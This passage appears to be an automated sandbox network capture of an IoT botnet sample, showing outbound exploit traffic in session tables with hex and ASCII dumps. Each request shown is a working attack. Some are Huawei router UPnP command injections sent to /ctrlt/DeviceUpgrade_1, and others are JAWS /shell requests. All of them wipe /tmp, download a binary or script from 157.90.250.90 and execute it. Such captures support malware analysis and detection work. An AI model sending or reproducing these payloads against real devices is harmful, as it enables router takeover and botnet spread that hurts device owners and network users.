                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 157.90.250.90 -l /tmp/.unstable -r /h0r0zx00xh0r0zx00xdefault/h0r0zx00x.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5192.168.2.2351712156.247.18.9337215
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:23:49.692291021 CET870OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Content-Length: 430
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 37 2e 39 30 2e 32 35 30 2e 39 30 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 68 30 72 30 7a 78 30 30 78 68 30 72 30 7a 78 30 30 78 64 65 66 61 75 6c 74 2f 68 30 72 30 7a 78 30 30 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 157.90.250.90 -l /tmp/.unstable -r /h0r0zx00xh0r0zx00xdefault/h0r0zx00x.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                          Jan 2, 2024 06:23:51.249968052 CET870OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Content-Length: 430
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 37 2e 39 30 2e 32 35 30 2e 39 30 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 68 30 72 30 7a 78 30 30 78 68 30 72 30 7a 78 30 30 78 64 65 66 61 75 6c 74 2f 68 30 72 30 7a 78 30 30 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 157.90.250.90 -l /tmp/.unstable -r /h0r0zx00xh0r0zx00xdefault/h0r0zx00x.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                          Jan 2, 2024 06:23:53.105696917 CET870OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Content-Length: 430
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 37 2e 39 30 2e 32 35 30 2e 39 30 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 68 30 72 30 7a 78 30 30 78 68 30 72 30 7a 78 30 30 78 64 65 66 61 75 6c 74 2f 68 30 72 30 7a 78 30 30 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 157.90.250.90 -l /tmp/.unstable -r /h0r0zx00xh0r0zx00xdefault/h0r0zx00x.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                          Jan 2, 2024 06:23:56.817182064 CET870OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Content-Length: 430
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 37 2e 39 30 2e 32 35 30 2e 39 30 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 68 30 72 30 7a 78 30 30 78 68 30 72 30 7a 78 30 30 78 64 65 66 61 75 6c 74 2f 68 30 72 30 7a 78 30 30 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 157.90.250.90 -l /tmp/.unstable -r /h0r0zx00xh0r0zx00xdefault/h0r0zx00x.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                          Jan 2, 2024 06:24:04.240123034 CET870OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Content-Length: 430
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 37 2e 39 30 2e 32 35 30 2e 39 30 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 68 30 72 30 7a 78 30 30 78 68 30 72 30 7a 78 30 30 78 64 65 66 61 75 6c 74 2f 68 30 72 30 7a 78 30 30 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 157.90.250.90 -l /tmp/.unstable -r /h0r0zx00xh0r0zx00xdefault/h0r0zx00x.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                          Jan 2, 2024 06:24:19.086064100 CET870OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Content-Length: 430
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 37 2e 39 30 2e 32 35 30 2e 39 30 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 68 30 72 30 7a 78 30 30 78 68 30 72 30 7a 78 30 30 78 64 65 66 61 75 6c 74 2f 68 30 72 30 7a 78 30 30 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 157.90.250.90 -l /tmp/.unstable -r /h0r0zx00xh0r0zx00xdefault/h0r0zx00x.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                          Jan 2, 2024 06:24:48.777895927 CET870OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Content-Length: 430
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 37 2e 39 30 2e 32 35 30 2e 39 30 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 68 30 72 30 7a 78 30 30 78 68 30 72 30 7a 78 30 30 78 64 65 66 61 75 6c 74 2f 68 30 72 30 7a 78 30 30 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 157.90.250.90 -l /tmp/.unstable -r /h0r0zx00xh0r0zx00xdefault/h0r0zx00x.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6192.168.2.2356150113.198.35.22280
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:23:49.840399981 CET232OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:23:50.770020962 CET232OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:23:52.625782013 CET232OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:23:56.561213017 CET232OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:24:03.984198093 CET232OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:24:18.830110073 CET232OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:24:48.777868032 CET232OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          7192.168.2.2338286101.42.123.6080
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:23:49.854020119 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:23:50.177582026 CET346INHTTP/1.1 404 Not Found
                                                          Date: Tue, 02 Jan 2024 05:23:50 GMT
                                                          Content-Type: text/html
                                                          Content-Length: 150
                                                          Connection: keep-alive
                                                          Keep-Alive: timeout=119
                                                          Server: VM-128-24-centos
